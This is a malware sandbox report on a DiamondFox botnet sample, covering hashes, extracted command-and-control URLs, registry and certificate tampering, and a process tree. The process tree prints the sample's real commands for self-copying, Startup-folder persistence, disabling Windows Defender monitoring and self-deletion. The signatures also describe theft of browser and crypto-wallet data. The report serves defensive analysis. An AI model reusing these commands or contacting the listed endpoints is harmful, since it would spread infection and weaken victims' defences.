Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
17/11/2020, 04:15
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
setup.exe
Resource
win10v20201028
General
-
Target
setup.exe
-
Size
90KB
-
MD5
1d5b46ff3cd12fd31362557299d6f488
-
SHA1
42f5d828b03f5e4c03e9f935683b5d82e6e7dc26
-
SHA256
2f134d1467c3765898a1befc311b86414f8df96d307a6f05b23eebbb8866a69c
-
SHA512
4dd2071b369bd150da53446313fff30b08054b8724a02444c400db2f0b14062c51a5aff2390b1845cc87b629ffc77ecc5e72877f77f824553b6f68a7b39a9d23
Malware Config
Extracted
diamondfox
https://www.datanalysis.club/ms/gate.php
https://www.datanalysis.site/ms/gate.php
https://www.datanalysis.space/ms/gate.php
cBFxpht5aCf0jy4gnUs3JgtqCB2O2tWJ
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 25 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral1/files/0x0004000000012fe2-25.dat diamondfox behavioral1/memory/1160-26-0x0000000006380000-0x0000000006390000-memory.dmp diamondfox behavioral1/files/0x0004000000012fe2-27.dat diamondfox behavioral1/files/0x0004000000012fe2-30.dat diamondfox behavioral1/files/0x0004000000012fe2-33.dat diamondfox behavioral1/files/0x0004000000012fe2-32.dat diamondfox behavioral1/files/0x0004000000012fe2-31.dat diamondfox behavioral1/files/0x0004000000012fe2-54.dat diamondfox behavioral1/files/0x0004000000012fe2-62.dat diamondfox behavioral1/files/0x0004000000012fe2-82.dat diamondfox behavioral1/files/0x0004000000012fe2-83.dat diamondfox behavioral1/files/0x0004000000012fe2-84.dat diamondfox behavioral1/files/0x0004000000012fe2-85.dat diamondfox behavioral1/files/0x0004000000012fe2-89.dat diamondfox behavioral1/files/0x0004000000012fe2-92.dat diamondfox behavioral1/files/0x0004000000012fe2-91.dat diamondfox behavioral1/files/0x0004000000012fe2-96.dat diamondfox behavioral1/files/0x0004000000012fe2-99.dat diamondfox behavioral1/files/0x0004000000012fe2-101.dat diamondfox behavioral1/files/0x0004000000012fe2-102.dat diamondfox behavioral1/files/0x0004000000012fe2-103.dat diamondfox behavioral1/files/0x0004000000012fe2-106.dat diamondfox behavioral1/files/0x0004000000012fe2-108.dat diamondfox behavioral1/files/0x0004000000012fe2-109.dat diamondfox behavioral1/files/0x0004000000012fe2-110.dat diamondfox -
Executes dropped EXE 5 IoCs
pid Process 1040 atiedxx.exe 884 atiedxx.exe 472 atiedxx.exe 960 atiedxx.exe 1080 atiedxx.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\atiedxx.lnk powershell.exe -
Loads dropped DLL 18 IoCs
pid Process 1160 powershell.exe 1160 powershell.exe 1040 atiedxx.exe 1040 atiedxx.exe 240 powershell.exe 1040 atiedxx.exe 884 atiedxx.exe 884 atiedxx.exe 1040 atiedxx.exe 472 atiedxx.exe 472 atiedxx.exe 1040 atiedxx.exe 960 atiedxx.exe 960 atiedxx.exe 1040 atiedxx.exe 1080 atiedxx.exe 1080 atiedxx.exe 1040 atiedxx.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1040 set thread context of 884 1040 atiedxx.exe 38 PID 1040 set thread context of 472 1040 atiedxx.exe 39 PID 1040 set thread context of 960 1040 atiedxx.exe 46 PID 1040 set thread context of 1080 1040 atiedxx.exe 47 -
Modifies data under HKEY_USERS 59 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates atiedxx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs atiedxx.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadDecisionTime = e08574fe98bcd601 atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD} atiedxx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadDecisionReason = "1" atiedxx.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadNetworkName = "Network" atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates atiedxx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy = "1" atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates atiedxx.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates atiedxx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs atiedxx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\32-e2-17-db-d2-77 atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs atiedxx.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e08574fe98bcd601 atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs atiedxx.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs atiedxx.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}\WpadDecision = "0" atiedxx.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 atiedxx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 atiedxx.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1900 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1160 powershell.exe 1160 powershell.exe 240 powershell.exe 240 powershell.exe 412 Powershell.exe 412 Powershell.exe 884 atiedxx.exe 884 atiedxx.exe 472 atiedxx.exe 472 atiedxx.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 240 powershell.exe Token: SeDebugPrivilege 412 Powershell.exe Token: SeDebugPrivilege 884 atiedxx.exe Token: SeCreateTokenPrivilege 884 atiedxx.exe Token: SeDebugPrivilege 960 atiedxx.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 836 setup.exe 1040 atiedxx.exe -
Suspicious use of WriteProcessMemory 101 IoCs
description pid Process procid_target PID 836 wrote to memory of 1160 836 setup.exe 29 PID 836 wrote to memory of 1160 836 setup.exe 29 PID 836 wrote to memory of 1160 836 setup.exe 29 PID 836 wrote to memory of 1160 836 setup.exe 29 PID 836 wrote to memory of 1160 836 setup.exe 29 PID 836 wrote to memory of 1160 836 setup.exe 29 PID 836 wrote to memory of 1160 836 setup.exe 29 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1160 wrote to memory of 1040 1160 powershell.exe 31 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 240 1040 atiedxx.exe 32 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 412 1040 atiedxx.exe 35 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 884 1040 atiedxx.exe 38 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 1040 wrote to memory of 472 1040 atiedxx.exe 39 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 884 wrote to memory of 1576 884 atiedxx.exe 43 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1576 wrote to memory of 1900 1576 cmd.exe 45 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 960 1040 atiedxx.exe 46 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 1080 1040 atiedxx.exe 47 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48 PID 1040 wrote to memory of 856 1040 atiedxx.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\setup.exe' -Destination 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe'2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe"C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\atiedxx.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe';$shortcut.Save()4⤵
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:240
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell Set-MpPreference -DisableRealtimeMonitoring 14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1900
-
-
-
-
C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe/scomma C:\Users\Admin\AppData\Local\tiedaxx\1.log4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:472
-
-
C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe/scomma C:\Users\Admin\AppData\Local\tiedaxx\2.log4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe/scomma C:\Users\Admin\AppData\Local\tiedaxx\3.log4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1080
-
-
C:\Users\Admin\AppData\Local\tiedaxx\atiedxx.exe/scomma C:\Users\Admin\AppData\Local\tiedaxx\4.log4⤵PID:856
-
-
-